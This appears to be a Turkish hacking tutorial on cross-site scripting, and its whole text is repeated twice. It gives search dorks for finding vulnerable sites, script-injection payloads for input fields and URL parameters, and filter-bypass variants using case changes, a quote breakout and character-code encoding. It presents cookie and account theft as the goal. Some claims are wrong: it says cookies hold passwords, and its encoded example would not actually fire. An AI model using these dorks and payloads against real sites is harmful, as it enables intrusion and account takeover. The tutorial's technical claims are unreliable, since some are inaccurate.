XSS Açığı Nedir?
XSS yani Cross Site Scripting sitelerdeki Html kod yazılım özelliğinin açık bırakılmasından dolayın arama, yorum yada mesaj kısımlarındaki yazı kutularında bulunan bir açık türüdür. Acunetix’in yaptığı bir araştırmaya siteler in %27’lik bir kısmı bu açıktan dolayı zarar görmüş.Xss başlı başına çok tehlikeli değildir ancak sniff konusunda bilgi sahibi kişilerin elinde en tehlikeli açık türlerindendir.
Web sitelerinde oturum açarken "Şifremi Hatırla" gibi seçenekleri işaretlediğimizde sistemde Cookie olarak adlandırdığımız küçük metin belgelerinde şifremiz saklanır.Bu saklanan şifre ise başka bir zaman giriş yaptığımızda şifrenin bize sorulmadan sisteme giriş yapmasını sağlar.XSS bir amacıda açığı kullanarak üyelerin cookie bilgilerini çalıp hesapları çalmaktır.
XSS için neler gerekli?
Chrome,Firefox yada Opera gibi bir tarayıcı gerekiyor.Eğer admin hesabına erişmek istiyorsan Sniffer kullanmamız gerekiyor.
Kaç Çeşit Xss Açığı vardır?
Temel olarak 3 çeşit
DOM XSS:
En tehlikeli Xss türüdür.JavaScript kodları kullanılarak yapılır.Virüs , trojan gibi zararlı yazılımlar sayfaya iliştirilebilir hatta saldırgan hedef sitenin indexini değiştirilebilir.
STORED XSS(Ziyaretçi Defteri): Açığın bulunduğu alana zararlı javascriptleri veri tabanına eklenerek o siteyi ziyaret eden herkesin etkilenmesi sağlanır.
REFLECTED XSS: Bu saldırı tarzında kurbanın sosyal mühendislik kullanılarak aldatılması yada boşluğuna denk getirilmesi ile kullanılıyor.
Xss Açıklı siteler nasıl bulunur?
inurl:”search.php?id=”
inurl:”index.php?id=”
inurl:”kayit.php?id=”
inurl:".php?cmd="
inurl:".php?z="
Dorklar üzerinde denemeler yapılarak çoğaltabiliriz.
1.Yöntem
Daha önce söylediğim gibi Text kutularında alert kodu yazmak.
"<script>alert(DENEME);</script>" yazdığımızda ekrana "DENEME" yazısı geliyorsa o sitede Xss açığının bulunduğunu söyleyebiliriz.
'>><marquee><h1>DENEME</h1></marquee>
gibi.
2.Sitedeki id değerinde
Bir sitenin; deger.php?id=5 şeklindeki id değerinin sağındaki rakamı silerek alert kodu yazıp çalıştırdığımızda çalışıyorsa açık vardır.
www.açıklısite.com/deger.php?id=5 şöyle olacak
www.açıklısite.com/deger.php?id=<script>alert(DENEME);</script>
3.Ziyaretçi defteri
Bu tür aralarında en çok denenen kısımdır STORED XSS deniyor. Html veya java kodları herkes görebildiğinden dolayı sayfaya giren herkesi kendi fake sayfasına yönlendiripi saldırıda bulunabilir.
Bypass
Bir sitede açık olduğunu biliyoruz ancak alert kodlarımız çalışmıyorsa bu durumda bypass yapmamız gerekiyor.
HTML Bypass
Alert kodumuzu encode yani şifreleyip aynı şekilde id değerinin sağında daha önce yaptığımız gibi deneyelim eğer açığı mevcutsa büyük ihtimalle alert verecektir.
JavaScript Bypass
<script>alert("DENEME");</script> olan kodumuzda küçük oynamalar yaparak alert almayı deniyoruz.Örneğin:
<ScRiPT>alert("DENEME");</ScRiPT> bu şekilde alertimizi alabiliriz.
ASCII Bypass
Alert kodumuzu denedik olmadı <script>alert("DENEME");</script> metini ASCII olarak değiştirip deneyelim.
Deneme=> ASCII: 068 069 078 069 077 069
String olarak alıyoruz=> String.fromCharCode(68,69,78,69,77,69)
<script>String.fromCharCode(68,69,78,69,77,69)</script>
Normal Bypass
Alert kodunun sadece başında oynama yapacağız şöyle olacak
<script>alert("DENEME");</script>
"><script>alert("DENEME");</script>
XSS yani Cross Site Scripting sitelerdeki Html kod yazılım özelliğinin açık bırakılmasından dolayın arama, yorum yada mesaj kısımlarındaki yazı kutularında bulunan bir açık türüdür. Acunetix’in yaptığı bir araştırmaya siteler in %27’lik bir kısmı bu açıktan dolayı zarar görmüş.Xss başlı başına çok tehlikeli değildir ancak sniff konusunda bilgi sahibi kişilerin elinde en tehlikeli açık türlerindendir.
Web sitelerinde oturum açarken "Şifremi Hatırla" gibi seçenekleri işaretlediğimizde sistemde Cookie olarak adlandırdığımız küçük metin belgelerinde şifremiz saklanır.Bu saklanan şifre ise başka bir zaman giriş yaptığımızda şifrenin bize sorulmadan sisteme giriş yapmasını sağlar.XSS bir amacıda açığı kullanarak üyelerin cookie bilgilerini çalıp hesapları çalmaktır.
XSS için neler gerekli?
Chrome,Firefox yada Opera gibi bir tarayıcı gerekiyor.Eğer admin hesabına erişmek istiyorsan Sniffer kullanmamız gerekiyor.
Kaç Çeşit Xss Açığı vardır?
Temel olarak 3 çeşit
DOM XSS:
En tehlikeli Xss türüdür.JavaScript kodları kullanılarak yapılır.Virüs , trojan gibi zararlı yazılımlar sayfaya iliştirilebilir hatta saldırgan hedef sitenin indexini değiştirilebilir.
STORED XSS(Ziyaretçi Defteri): Açığın bulunduğu alana zararlı javascriptleri veri tabanına eklenerek o siteyi ziyaret eden herkesin etkilenmesi sağlanır.
REFLECTED XSS: Bu saldırı tarzında kurbanın sosyal mühendislik kullanılarak aldatılması yada boşluğuna denk getirilmesi ile kullanılıyor.
Xss Açıklı siteler nasıl bulunur?
inurl:”search.php?id=”
inurl:”index.php?id=”
inurl:”kayit.php?id=”
inurl:".php?cmd="
inurl:".php?z="
Dorklar üzerinde denemeler yapılarak çoğaltabiliriz.
1.Yöntem
Daha önce söylediğim gibi Text kutularında alert kodu yazmak.
"<script>alert(DENEME);</script>" yazdığımızda ekrana "DENEME" yazısı geliyorsa o sitede Xss açığının bulunduğunu söyleyebiliriz.
'>><marquee><h1>DENEME</h1></marquee>
gibi.
2.Sitedeki id değerinde
Bir sitenin; deger.php?id=5 şeklindeki id değerinin sağındaki rakamı silerek alert kodu yazıp çalıştırdığımızda çalışıyorsa açık vardır.
www.açıklısite.com/deger.php?id=5 şöyle olacak
www.açıklısite.com/deger.php?id=<script>alert(DENEME);</script>
3.Ziyaretçi defteri
Bu tür aralarında en çok denenen kısımdır STORED XSS deniyor. Html veya java kodları herkes görebildiğinden dolayı sayfaya giren herkesi kendi fake sayfasına yönlendiripi saldırıda bulunabilir.
Bypass
Bir sitede açık olduğunu biliyoruz ancak alert kodlarımız çalışmıyorsa bu durumda bypass yapmamız gerekiyor.
HTML Bypass
Alert kodumuzu encode yani şifreleyip aynı şekilde id değerinin sağında daha önce yaptığımız gibi deneyelim eğer açığı mevcutsa büyük ihtimalle alert verecektir.
JavaScript Bypass
<script>alert("DENEME");</script> olan kodumuzda küçük oynamalar yaparak alert almayı deniyoruz.Örneğin:
<ScRiPT>alert("DENEME");</ScRiPT> bu şekilde alertimizi alabiliriz.
ASCII Bypass
Alert kodumuzu denedik olmadı <script>alert("DENEME");</script> metini ASCII olarak değiştirip deneyelim.
Deneme=> ASCII: 068 069 078 069 077 069
String olarak alıyoruz=> String.fromCharCode(68,69,78,69,77,69)
<script>String.fromCharCode(68,69,78,69,77,69)</script>
Normal Bypass
Alert kodunun sadece başında oynama yapacağız şöyle olacak
<script>alert("DENEME");</script>
"><script>alert("DENEME");</script>
